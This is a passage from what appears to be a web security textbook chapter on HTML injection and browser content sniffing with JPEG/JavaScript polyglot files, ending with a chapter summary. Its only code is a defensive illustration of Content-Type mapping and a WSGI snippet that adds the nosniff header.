Note that the CSRF token cookie will still be displayed as this setting applies to the session ID cookie only.
Restart Apache again with sudo apachectl restart, recreate the comment, reload, and confirm the JavaScript is not executed.
The solution to this exercise is in coffeeshop/vagrant/snippets/xss.txt.
HTML Injection
Before leaving XSS, we should discuss the related vulnerability of HTML injection. This occurs when an attacker can get HTML code interpreted as part of a page. We include it here rather than in the section on injection as it arises from the same vulnerability. The difference between this and Stored XSS is that the injected text is HTML not JavaScript.
Even without JavaScript code, HTML injection can be harmful. An attacker can deface a site by adding images with IMG tags or entire pages with <iframe> tags. They can create links that can be used to track visitors or deliver malware.
Defending against HTML injection is the same as against XSS—sanitize user input.
7.8 Content Sniffing
We looked at potential vulnerabilities of file uploading in Chapter 5. Among the defenses, we said developers should confirm that the file type matches what is expected.
It is possible for a file to simultaneously be valid syntax for more than one file type. These are called polyglot files. They can potentially be useful to attackers because of a feature in browsers that causes them to change the content type from what was given in the server’s HTTP response.
Consider the following example. An attacker wants to upload malicious JavaScript to a site. The only opportunity to get code onto the server is an image upload form (e.g., on a social media site). Perhaps the site filters JavaScript uploads using Content Security Policy (CSP), which we will discuss in Chapter 8.
The attacker constructs a file containing the malicious JavaScript that is also a valid JPEG file, calling it myimage.jpg. They then upload it using the image upload form. The server checks the content and confirms it is a JPEG file.
Most web servers derive the Content-Type header from the file extension. When the client requests myimage.jpg, the server looks at the extension and sends the image with Content-Type: image/jpeg. The script should fail to execute.
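The extension-to-type mapping most servers use is the same one exposed by Python's standard mimetypes module, which makes the behavior easy to inspect:

```python
import mimetypes

# Web servers typically map the file extension to the Content-Type header.
# The file's actual contents are not examined at all.
content_type, encoding = mimetypes.guess_type('myimage.jpg')
print(content_type)  # image/jpeg
```

Because only the extension is consulted, the polyglot file is served as image/jpeg regardless of the JavaScript hidden inside it.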
However, many browsers try to be clever and assume the server has made an error. The browser is expecting application/javascript but receives image/jpeg. Believing the server may have sent the wrong content type, it inspects the file to check if it is actually JavaScript. As the image is both valid JPEG and JavaScript, the browser will decide it is actually a script and will execute it.
This is a somewhat esoteric vulnerability, but it can be demonstrated to be exploitable. Gareth Heyes at PortSwigger showed that it is possible to create a file that is simultaneously valid JPEG and JavaScript.4 We have extended this idea to create a script that can join (more or less) arbitrary JPEG images and JavaScript files into one file, which is valid syntax for both.
If you look at your coffeeshop Git clone, you will see a directory called other/jpgjs containing this script along with an example. The JPEG/JavaScript file is hackedimage.jpg. It is a valid image of a Swiss mountain. It is also JavaScript that displays a message in an alert window.
Open the index.html file in Firefox. The image will be displayed, and the alert will pop up. Both come from the same file. It works in older versions of Chrome though not in the most recent ones.
The defense is to send the X-Content-Type-Options: nosniff response header, which instructs the browser not to perform this content inspection. It can be added to all responses.
In Django, the nosniff header is enabled and disabled with the SECURE_CONTENT_TYPE_NOSNIFF variable in settings.py. It is set to True by default, adding the preceding header to all responses.
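For responses generated outside Django, the header can be added by hand. A minimal WSGI sketch (the application and response body are placeholders, not the coffeeshop code):

```python
def application(environ, start_response):
    headers = [
        ('Content-Type', 'image/jpeg'),
        # Instruct the browser to trust the declared type and not sniff the body
        ('X-Content-Type-Options', 'nosniff'),
    ]
    start_response('200 OK', headers)
    return [b'']  # image bytes would go here
```

With the header present, a compliant browser will treat the response strictly as image/jpeg and will not execute it as a script.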
7.9 Summary
Code that handles user input is a common source of vulnerabilities in web applications. We saw that it gives attackers the opportunity to have their own code executed on the server or by victims’ browsers.
We looked at how cookies work and how to set their parameters safely, for example, by giving appropriate values to the SameSite parameter.
We examined user input–oriented vulnerabilities and how to secure code against them.
Injection attacks exploit vulnerable user input–handling code. SQL injection attacks work by getting an attacker's SQL code executed on the database through unsanitized input fields. Command injection attacks are similar, but the attacker's input is executed as shell commands on the server. Code injection attacks seek to get program code, for example Python, executed. We saw that input sanitization is the best defense against injection.
Server-side request forgery is an attack where a hacker embeds their own request inside an API call and uses it to execute commands behind the server's firewall.
We also looked at a client-side attack: cross-site scripting. In these attacks, a hacker aims to get their JavaScript code executed in a victim's browser. The best defenses are sanitizing user input and safe use of cookie settings such as the HttpOnly parameter.
We ended the chapter by looking at how the browser's content-sniffing feature can be exploited.
In the next chapter, we look at cross-site requests: how to allow our server to access other sites without introducing vulnerabilities.